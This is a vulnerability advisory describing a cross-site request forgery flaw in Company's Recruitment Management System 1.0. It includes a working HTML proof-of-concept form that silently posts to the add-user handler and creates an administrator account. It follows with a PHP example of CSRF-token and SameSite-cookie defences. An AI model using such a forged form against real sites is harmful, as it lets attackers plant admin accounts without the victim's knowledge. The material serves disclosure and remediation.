## https://sploitus.com/exploit?id=PACKETSTORM:164527
# Exploit Title: Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)  
# Date: 18-10-2021  
# Exploit Author: Aniket Anil Deshmane  
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip  
# Version: 1  
# Tested on: Windows 10, XAMPP  
  
Detail:  
The application does not use any anti-CSRF token to protect its state-changing requests. Therefore, a malicious user can add a new administrator user account by means of a crafted POST request.  
  
CSRF PoC:  
  
  
```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/employment_application/Actions.php?a=save_user"
method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="fullname" value="Test" />
<input type="hidden" name="username" value="Test" />
<input type="hidden" name="type" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
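What the missing server-side check looks like, as an added example from a defensive standpoint (this is not the advisory's PoC nor the vendor's code; the function names and the `csrf_token` field name are assumptions):

```php
<?php
// Added example, not part of the advisory or the vendor's application:
// a synchronizer-token guard for a handler such as Actions.php?a=save_user.
// Function names and the "csrf_token" field name are assumptions.

// Defence in depth: a SameSite session cookie already blocks most cross-site
// POSTs from carrying the session (PHP >= 7.3 supports the 'samesite' option).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Issue one unguessable token per session; called when rendering a form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every state-changing form (e.g. the add-user form).
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

// Constant-time comparison of the submitted token against the session's token.
// A cross-site form like the PoC above has no way to learn the session token,
// so its POST fails here before any user is written.
function csrf_check(): void {
    $sent     = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    if ($expected === '' || !is_string($sent) || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}

// Dispatch: the vulnerable handler runs the save logic directly; the hardened
// one only reaches it after csrf_check() has passed.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_GET['a'] ?? '') === 'save_user') {
    csrf_check();
    // ... existing save_user logic (insert fullname/username/type) runs here ...
}

// Rendering side: the legitimate add-user form carries the token field.
echo '<form method="POST" action="Actions.php?a=save_user">'
   . csrf_field()
   . '<input name="fullname" /><input name="username" />'
   . '<input type="hidden" name="type" value="1" />'
   . '<input type="submit" value="Save" /></form>';
```

Rotating the token after each successful submission and rejecting requests whose `Origin` header does not match the site are further checks that fit alongside this one.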